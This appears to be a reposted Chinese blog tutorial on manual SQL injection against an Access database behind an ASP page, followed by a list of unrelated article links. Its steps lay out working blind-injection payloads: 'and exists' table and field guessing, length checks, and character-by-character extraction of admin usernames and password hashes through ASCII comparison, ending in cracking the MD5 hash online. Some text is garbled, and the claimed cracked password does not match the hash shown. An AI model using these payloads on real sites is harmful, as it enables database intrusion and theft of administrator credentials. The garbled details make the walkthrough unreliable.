博客
关于我
SQL注入access数据库
阅读量:669 次
发布时间:2019-03-16

本文共 914 字,大约阅读时间需要 3 分钟。

SQL注入是一种敏感的安全漏洞,通常通过未正确处理或过渡;++_operator来导致,允许攻击者执行恶意SQL命令。以下是一些手动操作SQL注入的步骤和技巧。

1. 检查注入可能性

首先,观察URL参数是否能够直接注入数据库。例如:

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139

若返回正常响应(如1=1),则表明路径存在注入漏洞。

2. 猜测数据库表名

使用以下SQL语句猜测数据库表名:

and exists (select * from 表名)

替换表名为常见的管理员表名,如admina_adminx_admin等。

  • 如果存在该表名,页面返回正常,说明表名正确。
  • 如果返回错误,继续调整表名或尝试其他名称。

3. 猜测字段名称

逐步猜测字段名称,例如:

and exists (select 字段名 from 表名)

替换字段名为常见管理员字段,如adminpassword等。

  • 确认字段存在后,继续下一步骤。

4. 判断字段长度

测量字段长度,例如:

and (select top 1 len(字段) from 表名) > 0
  • 测试用户名字段长度:and (select top 1 len(admin) from admin) > 0
  • 测试密码字段长度:and (select top 1 len(password) from admin) > 0

这有助于确定字段的具体长度。

5. 分析ASCII码

逐一分析字符的ASCII码:

  • 使用以下SQL语句获取字符ASCII码值:
and (select top 1 asc(mid(字段, 1, 1)) from 表名) > 0
  • 逐步确定每个字符的ASCII码值。
  • 示例:用户_id为admin,密码逐步分析为a48e190fafc257d3

6. 密码解密

将获取到的密码哈希值解密。例如:

bendss

使用在线MD5解密工具仔细核对解密结果。

7. 总结

通过以上步骤,从SQL注入点逐步挖掘数据库结构,获取管理员账号和密码。记住,测试环境至关重要,避免对生产环境造成损害。

转载地址:http://vmnqz.baihongyu.com/

你可能感兴趣的文章
Objective-C实现iterating through submasks遍历子掩码算法(附完整源码)
查看>>
Objective-C实现jaccard similarity相似度无平方因子数算法(附完整源码)
查看>>
Objective-C实现Julia集算法(附完整源码)
查看>>
Objective-C实现k nearest neighbours k最近邻分类算法(附完整源码)
查看>>
Objective-C实现k-Means算法(附完整源码)
查看>>
Objective-C实现k-nearest算法(附完整源码)
查看>>
Objective-C实现Knapsack problem背包问题算法(附完整源码)
查看>>
Objective-C实现knapsack背包问题算法(附完整源码)
查看>>
Objective-C实现knapsack背包问题算法(附完整源码)
查看>>
Objective-C实现knight tour骑士之旅算法(附完整源码)
查看>>
Objective-C实现KNN算法(附完整源码)
查看>>
Objective-C实现koch snowflake科赫雪花算法(附完整源码)
查看>>
Objective-C实现KPCA(附完整源码)
查看>>
Objective-C实现kth order statistick阶统计量算法(附完整源码)
查看>>
Objective-C实现LongestIncreasingSubsequence最长递增子序列算法(附完整源码)
查看>>
Objective-C实现LRU 缓存算法(附完整源码)
查看>>
Objective-C实现lstm prediction预测算法(附完整源码)
查看>>
Objective-C实现Luhn (Mod 10)Algorithm算法(附完整源码)
查看>>
Objective-C实现max subarray sum最大子数组和算法(附完整源码)
查看>>
Objective-C实现MaximumSubarray最大子阵列(动态规划解决方案)算法(附完整源码)
查看>>